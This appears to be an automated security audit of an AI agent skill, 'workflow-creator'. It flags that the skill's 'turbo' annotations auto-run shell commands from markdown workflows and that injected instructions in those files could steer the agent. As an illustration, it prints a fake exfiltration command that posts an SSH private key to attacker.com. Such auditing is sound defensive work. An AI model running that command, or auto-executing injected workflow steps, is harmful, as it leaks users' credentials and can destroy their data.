workflow-creator
Fail
Audited by Gen Agent Trust Hub on Feb 17, 2026
Risk Level: HIGHCOMMAND_EXECUTIONPROMPT_INJECTION
Full Analysis
- [COMMAND_EXECUTION] (HIGH): The skill implements a 'turbo' and 'turbo-all' annotation system designed to automatically execute shell commands found in markdown files.
- Evidence: SKILL.md defines
// turboand// turbo-allto 'Auto-run the next step' or 'ALL steps'. - Evidence: Templates in
references/workflow-templates.mdinclude commands likenpm run deploy,rm -rf, andgit pushwhich can have significant side effects if modified or misused. - [PROMPT_INJECTION] (HIGH): The skill is highly susceptible to indirect prompt injection (Category 8). It reads, processes, and writes markdown files that contain executable instructions.
- Ingestion points: The skill reads files from
.agent/workflows/and takes user input to generate new ones (SKILL.md). - Boundary markers: None identified in the provided files to distinguish between safe instructions and potentially malicious injected commands.
- Capability inventory: The skill explicitly has the capability to execute shell commands (via the turbo annotations) and write files to the local filesystem.
- Sanitization: No evidence of sanitization or validation of the commands being written to or read from the workflow files.
- [DATA_EXFILTRATION] (MEDIUM): While no explicit exfiltration code is present, the ability to execute arbitrary shell commands via the turbo feature allows for trivial data exfiltration (e.g.,
curl -d @~/.ssh/id_rsa attacker.com).
Recommendations
- AI detected serious security threats
Audit Metadata